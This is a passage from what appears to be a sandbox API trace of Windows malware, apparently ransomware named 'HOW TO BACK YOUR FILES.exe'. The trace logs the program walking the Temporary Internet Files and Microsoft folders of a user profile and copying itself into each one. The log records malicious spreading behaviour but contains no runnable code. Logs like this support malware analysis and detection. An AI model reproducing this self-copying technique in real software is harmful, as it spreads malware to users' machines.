lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.643] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.644] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.644] GetLastError () returned 0x0 [0042.644] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.644] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.644] CloseHandle (hObject=0x118) returned 1 [0042.645] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.645] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a3658a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a3658a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.645] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0042.646] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0042.646] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.646] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.646] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.646] GetLastError () returned 0x0 [0042.646] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.646] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.646] CloseHandle (hObject=0x118) returned 1 [0042.647] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.647] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.647] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0042.647] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0042.647] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.647] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.647] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.648] GetLastError () returned 0x0 [0042.648] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.648] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.648] CloseHandle (hObject=0x118) returned 1 [0042.648] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.648] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.648] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0042.648] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0042.648] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.648] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.649] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.649] GetLastError () returned 0x0 [0042.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.649] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.649] CloseHandle (hObject=0x118) returned 1 [0042.649] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.649] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4bc500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.649] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0042.649] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0042.650] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.650] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.650] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.650] GetLastError () returned 0x0 [0042.650] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.650] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.650] CloseHandle (hObject=0x118) returned 1 [0042.650] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.651] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.651] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0042.651] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0042.651] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.651] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.651] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.651] GetLastError () returned 0x0 [0042.652] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.652] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.652] CloseHandle (hObject=0x118) returned 1 [0042.652] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.652] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.652] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0042.652] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0042.652] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.652] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.653] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.653] GetLastError () returned 0x0 [0042.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.653] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.653] CloseHandle (hObject=0x118) returned 1 [0042.653] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.653] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.653] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0042.653] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0042.653] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.653] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.654] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.654] GetLastError () returned 0x0 [0042.654] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.654] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.654] CloseHandle (hObject=0x118) returned 1 [0042.654] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.654] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.655] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0042.655] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0042.655] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.655] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.655] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.655] GetLastError () returned 0x0 [0042.655] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.656] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: 